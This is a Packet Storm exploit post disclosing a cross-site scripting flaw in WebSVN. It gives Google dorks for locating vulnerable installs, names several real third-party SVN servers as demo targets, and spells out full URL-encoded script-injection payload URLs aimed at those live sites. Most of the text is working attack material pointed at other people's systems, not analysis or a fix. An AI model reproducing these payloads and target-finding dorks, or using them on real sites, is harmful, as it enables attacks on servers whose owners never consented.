WebSVN Cross Site Scripting

2011-12-17T00:00:00
ID PACKETSTORM:107973
Type packetstorm
Reporter Sony
Modified 2011-12-17T00:00:00

Description

                                        
                                            `# Exploit Title: WebSVN Cross Site Scripting  
# Date: 24.12.2011  
# Author: Sony  
# Software Link: http://websvn.tigris.org/  
# Google Dorks: inurl:/svn/listing.php?repname= or intext:"Powered by  
WebSVN"  
# Version: ???  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
..................................................................  
  
  
Demo:  
  
We have some code (oh, ugly code):  
  
http://codepad.org/pVCU96rQ  
  
http://lostsidedead.com/svn/comp.php?repname=haze&path=&  
  
Put our code in the "With Path:" and press Enter. Or open  
http://lostsidedead.com/svn/, click on the afftol and on the Compare Paths.  
  
  
http://svn.suretecsystems.com/svn/comp.php?repname=aberdeen.pm&path=&  
  
http://ciclope.fi.upm.es/svn/comp.php?repname=Ciclope+SVN&path=&  
  
http://sheelabs.gamemod.net/svn/comp.php?repname=sheelabs&path=&  
  
http://dev-svn.seasr.org/WebSVN/comp.php?repname=Components&path=%2F&  
  
or :  
  
  
http://code.clearfoundation.com/svn/revision.php?repname=l7-filter&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&rev=324&peg=324  
  
  
http://vector.ucsd.edu/svn/comp.php?repname=vector&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E  
  
or  
  
  
http://christianserving.org/websvn/diff.php?repname=TruePreview&path=%2F%3Chr+color%3D%22blue%22+size%3D%2270%22+style%3D%22border%3A+dotted+5pt%3B+border-color%3A+red+%22%3E%3Cmarquee+direction%3D%22up%22+scrollamount%3D%221%22+height%3D%22150%22+style%3D%22filter%3Awave%28add%3D1%2C+phase%3D10%2C+freq%3D2%2C+strength%3D300%29%3B+colortag%3D%22red%22%3B%3E%3Cfont+color%3D%22navy%22+size%3D%2B3%3EFLYING+TEXT%3C%2Ffont%3E%3C%2Fmarquee%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E  
  
Video : (because it's a specific xss)  
  
http://www.youtube.com/watch?v=e9u0zDCrddk  
`